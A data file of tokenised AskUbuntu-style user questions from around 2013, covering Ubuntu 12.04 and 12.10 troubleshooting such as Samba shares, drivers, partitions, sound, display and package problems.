257597	ubuntu desktop 12.04 can not connect to samba shares	i am new to ubuntu , but making progress . i have a server set up on console mode and configured samba . i am able to connect to these samba shares using my windows 7 clients . i installed ubuntu desktop 12.04 and when i try to connect to these same shares using nautilus 3.4.2 i keep getting prompted for my password . i searched some forums and added some suggested lines to /etc/samba/smb.conf client lanman auth = yes client ntlmv2 auth = no samba was also defaulting to the workgroup 'workgroup ' and my samba shares are in a workgroup named 'grokii ' . i also edited the 'workgroup = ' line to reflect that . i rebooted the desktop and the default workgroup is still workgroup and the credintials that work on windows 7 do not work with nautilus . i would appreciate any recommendations on what my next step should be . here my my entire /etc/samba/smb.conf file : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = grokii # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # modification by grokii 2/2013 , tweak needed to get ubuntu 12.x smb to work client lanman auth = yes client ntlmv2 auth = no # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom
257600	marvell 's wireless driver not recognized	i just got the surface pro and , after much hassle , managed to install ubuntu in it - currently using 12.10 . everything works mostly fine out of the box with the exception of the wireless adapter . it is a marvell 's 88w8797 . i have heard of people using ndiswrapper but i do n't how to use it and i have n't been able to find the driver .
257601	install apache with development tools	i 'm trying to do this http : //php.webtutor.pl/en/2011/04/25/mod_rewrite-and-hiphop-for-php-on-apache-web-server/ but the yum -y install httpd httpd-devel gives -bash : yum : command not found . i 'm on 12.04 . i already have apache installed . i just do n't know how to get the `` development tools '' . please show me how . many thanks in advance !
257602	bash prompt changes colors on ls	my prompt is : ps1= '' \`if [ \ $ ? = 0 ] ; then echo \ [ \e [ 33m\ ] ' : ) '\ [ \e [ 0m\ ] ; else echo \ [ \e [ 31m\ ] ' : ( '\ [ \e [ 0m\ ] ; fi\` \e [ 0 ; 1m\w\e [ 1m\n\ $ `` the problem is when i use ls , the prompt changes colors to the color of the last line outputted with ls . for example , if i have a file named z , the prompt changes to grey ( to match the color of files from ls ) after typing ls , and this behavior is driving me nuts . anyone know how i can fix that ? i want the entire prompt set to white , with the smilies colored differently . ( my prompt spits out a : ) or a : ( based on the outcome fo the last command , shows the directory path of pwd , then drops to a new line for command input ) i 've enabled force_color_prompt to no avail .
257609	ubuntu 12.04 using wubi wo n't load up	so i 'm trying to install ubuntu using the wubi client . everything goes fine , but when it restarts and tries to load up ubuntu , i get to the purple screen and it says `` preparing to start up for the first time '' or something like that . i ca n't get passed this screen , it just stays there until i restart the computer . can anyone help me out with this ? would really appreciate it . graphics card currently in use is a geforce 9200 if that helps any .
257610	12.04 vs 12.10 for pcs with less graphics memory	i have an old pc with 2gb ddr2 ram , 3.0ghz pentium 4 processor and fujitsu/siemens d1901 motherboard with 64mb built-in graphics memory . i 've tried 12.10 on this configuration but it was laggy probably due to limited graphics memory . so , i am wondering if i can install 12.04 or any other version that is less hungry for graphics memory . if there are any tricks to make 12.10 run faster please let me know because it was n't running that bad i think few tweaks could work . the thing that annoyed me was the dash it was taking around 3-4 seconds to open . please , tell me if i can make 12.10 work on this configuration or 12.04 is better option . thanks .
257611	how can i install software without an internet connection ?	i installed ubuntu alongside windows . if i do n't have an internet connection , how can i manually install the audio plugins , some drivers and stuff like that ? is there any offline process where i can have all my software in some folder and use them whenever i format the system ?
257617	how can i upgrade the ubuntu lts kernel to newer ?	i just installed ubuntu 12.04.2 64-bit on my desktop pc and i see the kernel in system monitor is 3.5.0-23 but in ubuntu 12.04.2 in my laptop the kernel is 3.2.0-38 . i have already tried to run the command sudo apt-get upgrade & & sudo apt-get dist-upgrade on my laptop but it does n't update the kernel . how can i upgrade kernel for my laptop ?
257619	install ( side-by-side with windows ) & uninstall ubuntu	i 'm looking for way to install it alongside the windows and at the same time also looking for `` how to '' uninstall ubuntu ( in case i need to get things done quickly as i 'm not used to ubuntu and in case i dislike ubuntu ) . btw , i have preinstalled windows 7 ( 64 bit ) on my laptop ( hp probook 4331s ) and wonder will it be okay to install ubuntu side-by-side ? ? i also make my usb bootable disk ubuntu 12.04 lts 32 bit , is it ok when mine is windows 7 64 bit ? thank you please help me
257620	can i add an elapsed time bar for rhythmbox player in the sound menu ?	if so , how do i get to be this way ?
257628	no icons on main screen on virtualbox	i 've tried everything , i 've uninstalled and reinstalled , i 've tried adding guest additions , nothing is working . edit : i should also add i 've been using this guide to getting vb set up : http : //alexmk.hubpages.com/hub/how-to-install-ubuntu-steam-tf2-under-virtualbox-on-windows-to-get-linux-tux-promo
257631	mysql workbench installation issue on ubuntu 12.04 , 64-bit system	i am getting dependency package errors as : root @ osscube : /home/abdul/downloads # dpkg -i mysql-workbench-gpl-5.2.47-1ubu1004-amd64.deb selecting previously unselected package mysql-workbench-gpl . ( reading database ... 153925 files and directories currently installed . ) unpacking mysql-workbench-gpl ( from mysql-workbench-gpl-5.2.47-1ubu1004-amd64.deb ) ... dpkg : dependency problems prevent configuration of mysql-workbench-gpl : mysql-workbench-gpl depends on libmysqlclient16 ( > = 5.1.21-1 ) ; however : package libmysqlclient16 is not installed . mysql-workbench-gpl depends on libpython2.6 ( > = 2.6 ) ; however : package libpython2.6 is not installed . mysql-workbench-gpl depends on libzip1 ( > = 0.9 ) ; however : package libzip1 is not installed . mysql-workbench-gpl depends on python-paramiko ; however : package python-paramiko is not installed . mysql-workbench-gpl depends on python-pysqlite2 ; however : package python-pysqlite2 is not installed . dpkg : error processing mysql-workbench-gpl ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... errors were encountered while processing : mysql-workbench-gpl i have tried to run apt-get -f install , but i didn ' have any success . i have also tried to install these dependent packages as : apt-get install libmysqlclient16 libpython2.6 libzip1 python-paramiko python-pysqlite2 reading package lists ... done building dependency tree reading state information ... done package libmysqlclient16 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libpython2.6 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libzip1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libmysqlclient16 ' has no installation candidate e : package 'libpython2.6 ' has no installation candidate e : package 'libzip1 ' has no installation candidate how do i fix this ?
257634	pipe a single application 's sound to another machine via pulseaudio	is there any way to output a single ( or multiple , but only select ) application sound to another machine using the pulseaudio multicasting ( or something similar ) ? my exact setup is the following : main machine hooked up to headphones running banshee , wine ( running wow ) , and mangler ( linux native vent voip client ) second machine with speakers running ubuntu server ( with a full unity desktop installed and banshee ) currently i run synergy between both and control the banshee on the server and utilize it as a jukebox but i find it annoying to have to rsync my songs and play counts/ratings/banshee.db every so often . i would like to be able to just run banshee on my main machine and pipe the output to the server . ive tried several media servers etc and havent been too happy with them ( mainly the controls/interface are to blame ) . so ... help me obi-wan-community ! you 're my only hope : )
257636	how to connect tektronix tds10001b to ubuntu ?	i 'm trying to connect a tektronix tds1001b to ubuntu precise . i have managed to connect the scope to a windows xp machine running tekvisa openchoice so hardware is working . is there any tutorial how to connect such scope to linux ? on ubuntu precise , i have followed this tutorial . i have installed python-gpib_3.2.11-0.2ubuntu7_i386.deb as well as libgpib0_3.2.11-0.2ubuntu7_i386.deb . i have matlab installed too . when i run this python code , i get : root @ laptop : ~ # dmesg -c [ 296.744133 ] usb 3-1 : new full-speed usb device number 2 using uhci_hcd [ 296.918061 ] generic-usb 0003:0699:036b.0005 : hiddev0 , hidraw4 : usb hid v1.00 device [ tektronix , inc. tektronix tds1001b ] on usb-0000:00:1a.0-1/input0 [ 297.504214 ] usb 3-1 : usb disconnect , device number 2 [ 299.432087 ] hub_port_connect_change : 30 callbacks suppressed [ 299.432099 ] hub 3-0:1.0 : connect-debounce failed , port 1 disabled [ 299.732161 ] usb 3-1 : new full-speed usb device number 3 using uhci_hcd [ 299.947136 ] usbcore : registered new interface driver usbtmc root @ laptop : ~ # lsmod | grep usbtmc usbtmc 17996 0 root @ laptop : ~ # ls -lah /dev/usbtmc0 crw -- -- -- - 1 root root 180 , 176 feb 17 22:36 /dev/usbtmc0 root @ laptop : ~ # cat /dev/usbtmc0 cat : /dev/usbtmc0 : connection timed out root @ laptop : ~ # python tds-2012.py failed to open configuration file traceback ( most recent call last ) : file `` tds-2012.py '' , line 34 , in < module > gpib.find ( 'scope ' ) gpib.error : find error : ca n't find device ! any idea how i could figure out what is the name of my scope ? is there a command line library for gpib ? any idea how to manage to run this tutorial ?
257637	linux partition shows up as unallocated	i had windows 8 installed with 2 ubuntu parititions in dual boot , everything running well . i hated win 8 so i installed win 7 over it by deleting my 80gb windows partition and installing it in there . but now i ca n't boot ubuntu up , since obviously windows has overwritten grub . routine stuff , so i booted into a live cd , opened up gparted , and i see that the 80gb space that is supposed to be two 40gb ubuntu partition is showing up as unallocated ! what 's happened here ? is there a possiblity that there 's some error in detecting the partition ? i 'm 100 % sure i did n't delete that partition in the windows installation process !
257638	why does ubuntu logins to an orange screen ?	i have installed ubuntu 12.10 on my pc replacing with with windows xp . installation is successfully done and i can login in to system . but the desktop does n't appear . it only shows an orange screen . i had waited too much but not success to get to the desktop .
257640	problem with alsa installed	i 'm using linux for the first time . i installed alsa 1.0.24 in my system running ubuntu 12.04 . after installing , i tried to play some files using command aplay -vv abc.wav , it started playing but i ca n't hear the sound . $ cat /proc/asound/oss/ sndstat1 sound driver:3.8.1a-980706 ( alsa v1.0.24 emulation code ) kernel : linux developer-optiplex-170l 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:41:14 utc 2012 i686 config options : 0 installed drivers : type 10 : alsa emulation card config : intel ich5 with ad1980 at irq 17 audio devices : not enabled in config synth devices : not enabled in config midi devices : not enabled in config timers : 31 : system timer mixers : not enabled in config if i use the command aplay -l it shows the error as no soundcards found ... . but actually sound card is there . if i run cat /proc/asound/cards , it shows the sound card name as : 0 [ ich5 ] : ich4 - intel ich5 intel ich5 with ad1980 at irq 17 and even after installing alsamixergui , and if i run alsamixer ' , it showscannot open mixer : no such device` . whether it 's the problem with alsa or soundcard ?
257641	version of updated package	i 'm running apt-get upgrade and see list of available packages which could be upgraded . some of them without any version , how can i figure out what package version apt want to install here ? for example i see the next picture : base-files .. redmine redmine-mysql redmine-sqlite ... how to know what to what version redmine will be upgraded ? and from what repository apt going to take it ?
257643	install ubuntu12.04 ( lts )	i have a ubuntu 11.04 in my laptop but it is now not supported , now i want to install ubuntu 12.04 . for this i have download the .iso file of the ubuntu 12.04 . but my update manager recommend me to install 11.10 . so can i install ubuntu 12.04 .
257645	i broke my .nvidia-settings-rc file - ca n't see x	i was changing something in nvidia settings/config in xfce and now when i book to x screen is blank . i tried to book in console mode , worked , and when i try to launch nvidia-settings from the term i get no control display ... any quick tips ? edit1 : guys when i login in console mode ( recovery mode ) i ca n't delete .nvidia-settings-rc because it says file system is in read only mode ... and i don ; t know how to kill xorg in normal mode.. i 'm stuck with a black screen.. tried alt+ctrl+backspac , e tried alt+sys rq+k ... nothing works ! edit2 : i used mount -o remount , rw / and deleted both nvidia-settings-rc and xorg.conf . a new file was generated , but i still go to black screen as soon as x is started . edit3 even though the problem seemed trivial , i lost more than two days trying to fix it and decided to format and put a clean image of xubuntu . it seems one should be careful when changing stuff from nvidia settings . but for now i 'm sticking with nouveau driver ...
257646	how to extend ubuntu partation size ?	i 'm using ubuntu 12.10 64bit under my laptop , asus k53e-b . its hard disk drive volume 640gb . i have 3 operation systems : windows 7 , windows 8 ( i just wanted try it ) , and ubuntu 12.10 . i do n't know how and why , but when i installed ubuntu 12.10 i gave it 15gb , and after a month of using ubuntu , it 's starting to annoying . i mean , i ca n't install software , updates , new files etc . i need your help : how do i remove windows 8 completely ( i do n't have important files there ) , and extend ubuntu partition , to at least 90gb ? even though i do n't use windows 7 , i 'd rather do it ( i.e . extend ubuntu 's partition ) without harm windows 7 . when i say `` harm '' - i mean extend ubuntu , but windows will still working . i do n't mean do n't reduce windows ' space . all what i 've tried , including using gparted under livecd - does n't work . i guess i just do n't know how to use it . i really hope to get helped . sorry for my bad english > . < edit : fdisk -l : disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x98b324f9 device boot start end blocks id system /dev/sda1 * 45062325 357622964 156280320 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 357625854 1250263039 446318593 f w95 ext 'd ( lba ) partition 2 does not start on physical sector boundary . /dev/sda3 2048 32933887 16465920 83 linux /dev/sda4 32933888 45062143 6064128 82 linux swap / solaris /dev/sda5 357625856 1109917507 376145826 7 hpfs/ntfs/exfat /dev/sda6 1109919744 1110943743 512000 83 linux /dev/sda7 1110945792 1250263039 69658624 8e linux lvm partition table entries are not in disk order disk /dev/mapper/vg-lv_swap : 8187 mb , 8187281408 bytes 255 heads , 63 sectors/track , 995 cylinders , total 15990784 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vg-lv_swap does n't contain a valid partition table disk /dev/mapper/vg-lv_home : 21.0 gb , 21038628864 bytes 255 heads , 63 sectors/track , 2557 cylinders , total 41091072 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vg-lv_home does n't contain a valid partition table disk /dev/mapper/vg-lv_root : 42.1 gb , 42077257728 bytes 255 heads , 63 sectors/track , 5115 cylinders , total 82182144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vg-lv_root does n't contain a valid partition table
257648	libreoffice calc format page crashes and does not give options for sheet margins , portrait etc	using libreoffice version 3.6.0.2 under ubuntu 12.04.1 lts . since upgrading to libreoffice version 3.6 , format page in calc has limited tabs to choose from . the tabs available now are organiser , header ( right ) , header ( left ) , footer ( right ) and footer ( left ) . there is no longer a tab for sheet which gave options for orientation ( landscape/portrait ) , margins , etc . the organizer tab indicates the values of these settings , but gives no option to change any of them . how can i now change to landscape ? also , when i try to click on a different tab in format page , libreoffice crashes .
257655	what is the best way to get mtp working properly ?	anyone have any news on the latest/best way to get sony 's proprietary mtp working properly on ubuntu gnome ? ubuntu gnome shell remix 12.10 amd64 . sony xperia u ( no sd card support , only internal storage with mtp ) .
257657	xls file some formula not open in open office	in my office morethan 50system working in ubuntu desktop , but the problem is some of macro function not supported in openoffice . the formula values also changed when it is open in openoffice . is any possible to install libre office or any upgrade version in ubuntu 10.04
257659	why does ubuntu apply separate permissions to partitions mounted with the same parameters ?	here 's my partition setup . i 've shortened the uuids for readability , and , before anyone asks , i 've carefully checked that i copied the correct uuids into /etc/fstab . me @ ubuntu : / $ sudo blkid /dev/sda1 : uuid= '' a6205dda ... '' type= '' ext3 '' /dev/sda2 : uuid= '' 99397b94 ... '' type= '' ext3 '' label= '' data1 '' sec_type= '' ext2 '' /dev/sda3 : uuid= '' 135523f8 ... '' type= '' ext3 '' label= '' data2 '' sec_type= '' ext2 '' /dev/sda4 : uuid= '' a1e4d70f ... '' type= '' swap '' here 's how my fstab is configured : me @ ubuntu : /media/data2 $ cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=a6205dda ... / ext3 errors=remount-ro 0 1 uuid=99397b94 ... /media/data1 ext3 rw , nosuid , nodev , user 0 0 uuid=135523f8 ... /media/data2 ext3 rw , nosuid , nodev , user 0 0 uuid=a1e4d70f ... none swap sw 0 0 ( does whitespace matter in fstab ? for example , does each field have to be separated by a single tab ? or any number of tabs ? ) i 've set up the mount points for the partitions in the /media directory : me @ ubuntu : /media $ ls -al drwxr-xr-x 4 root root 4096 feb 18 09:17 . drwxr-xr-x 23 me me 4096 feb 13 10:08 .. drwxr-xr-x 2 me me 4096 feb 13 16:03 data1 drwxr-xr-x 2 me me 4096 feb 13 16:03 data2 thanks to the entries in the fstab , i can mount the partitions as an ordinary user , without any problems : me @ ubuntu : /media $ mount data1 me @ ubuntu : /media $ mount data2 me @ ubuntu : /media $ mount /dev/sda1 on / type ext3 ( rw , errors=remount-ro ) /dev/sda2 on /media/data1 type ext3 ( rw , noexec , nosuid , nodev , user=me ) /dev/sda3 on /media/data2 type ext3 ( rw , noexec , nosuid , nodev , user=me ) but here 's the problem : data2 is mounted as root , which means i do n't have write permissions for it . why the difference , and what can i do to ensure data2 is mounted with the same permissions as data1 ? me @ ubuntu : /media $ ls -al drwxr-xr-x 4 root root 4096 feb 18 09:17 . drwxr-xr-x 23 me me 4096 feb 13 10:08 .. drwxrwxrwx 10 me me 4096 feb 18 09:20 data1 drwxr-xr-x 3 root root 4096 feb 13 13:57 data2 for reference , i 'm using ubuntu 12.04.2 lts . also , the order in which i mount the partitions has no effect on their permissions ; they always have the permissions shown above .
257665	is accessing windows files possibly harmful ?	i have installed windows and ubuntu side by side on my system . i heard that it harmful to the hard disk if we access files ont the windows partition from ubuntu . is this true ?
257668	how to properly get screen rotation programmatically ?	i need to programatically obtain screen rotation . i 'm using qt and the x extension xrandr . i 'm trying the following : display *dpy ; window root ; xrrscreenconfiguration *conf ; rotation rotation ; int screen ; dpy = qx11info : :display ( ) ; root = qx11info : :approotwindow ( ) ; conf = xrrgetscreeninfo ( dpy , root ) ; screen = defaultscreen ( dpy ) ; xrrrotations ( dpy , screen , & rotation ) ; qdebug ( ) < < `` current rotation : '' < < rotation ; the problem is that independently of the current screen orientation , set through displays settings app from ubuntu , the current rotation output is always 1 . does anyone knows why ? thanks
257671	why does my screen go white ?	ubuntu 12.04 . ok , i do n't know if it 's my driver 's fault or ubuntu 's fault or mine . but while in ubuntu my laptop 's screen goes all white when not adjusting anything to the screen . i do n't know why , or how . i am suspecting it is ubuntu because when i adjust the brightness it changes the brightness on the white , instead of adjusting ubuntu 's brightness . how do i stop the white coming up like that ? here are my labelled specs : samsung nc10 with intel atom inside connected with vodafone energy star those were the labels on my computer . these are the proper specs : ( i 'm only doing the screen , but if you require more , just ask ) processor : intel® atom™ processor n270 ( 1.6ghz , 533mhz , 512kb , 2.5w ) display : lcd 10.1 / 10.2 '' wsvga ( 1024 x 600 ) led anti-glare display graphics : graphic processor : intel® 945gse ( integrated graphics ) graphic memory : intel® 945gse 128mb integrated graphics vga : yes so , is there anyway to get rid of that blank white screen ? any help appreciated . thanks .
257679	amd hp laptop - screen tearing	i recently defenestrated this laptop and i 'm having some issues with the graphics . i 'm seeing some pretty nasty screen tearing on this thing . i did n't notice any while the machine had windows 8 ( a brief amount of time , admittedly ) which leads me to suspect some kind of driver issue . googling led me to some tearing issues from ati drivers and the new version of x but since most posts are a bit dated i do n't know if that is what is happening to me . the machine is a g6-2211nr model with an amd a4-4300 apu and it 's running 12.10 . the computer details dialog is showing `` driver : unknown '' any ideas ? edit : i installed the proprietary drivers . upon reboot i reached the login screen and it looks flawless . however , after accessing my account , i can only see the desktop background and the mouse pointer . nothing else . i successfully reset everything . i 'm back in but the screen tearing is back . i checked to see if the tearing appears during the login screen with this `` working '' configuration that uses the opensource drivers and no , tere is no tearing during the login screen no matter how hard i try to bring it about . here is the output of lshw -c video right now : *-display description : vga compatible controller product : advanced micro devices [ amd ] nee ati vendor : advanced micro devices [ amd ] nee ati physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:48 memory : e0000000-efffffff ioport:3000 ( size=256 ) memory : f0300000-f033ffff aside from a fix , is n't there a way to just turn off hardware acceleration altogether ? just cpu render the whole thing ?
257682	virtual installation : where to find the iso	i 'm running windows 7 on my computer ( 64-bit ) and i need to install ubuntu 12.10 ( kernel : 3.5.0-17-generic ) virtually . i 've installed virtualbox from oracle but i ca n't find the iso image for this ubuntu version . plus , i 've read that there are certain procedures in order to install and write c/c++ programs ( some people said that installing eclipse was a problem and others said that the gcc compiler was a problem ) and that it 's not as simple as windows . so would anyone please tell me where to find the iso image and what steps should i do to successfully start writing parallel programs on ubuntu .
257683	can not receive upower signals	i am newbie in dbus , so please be patient with me . i have a following code : http : //pastebin.com/8zpm7pwb . it is some sample i found and changed to suit my case . general idea is to 'trap ' dbus signals from com.canonical.unity.panel.service and from org.freedesktop.upower ( mainly the second one - i use panel only as comparison ) . the problem is that i am receiving unity panel signals , but none from upower . i did launch dbus-monitor in second terminal in the same time , so i know for sure , that those signals do fly around . i did also testing on those interfaces one by one and the result is the same - code with unity panel interface gets signals i want , code with upower does n't - it simply blocks on dbus_connection_read_write ( conn , -1 ) ; and never goes on . can anyone show me where am i making mistake ?
257684	how to know if my ubuntu machine is running 32 or 64 bit os	what command should i run to identify if i am running a 32 or a 64 bit os
